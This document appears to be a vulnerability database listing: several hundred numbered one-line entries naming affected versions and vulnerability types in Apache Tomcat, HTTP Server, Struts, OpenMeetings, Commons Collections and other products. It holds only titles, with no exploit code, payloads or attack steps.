| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
| [98601] Apple macOS up to 10.12.3 Apache denial of service
| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
| [98405] Apache Hadoop up to 0.23.10 privilege escalation
| [98199] Apache Camel Validation XML External Entity
| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
| [97081] Apache Tomcat HTTPS Request denial of service
| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
| [95311] Apache Storm UI Daemon privilege escalation
| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
| [94540] Apache Tika 1.9 tika-server File information disclosure
| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
| [93532] Apache Commons Collections Library Java privilege escalation
| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
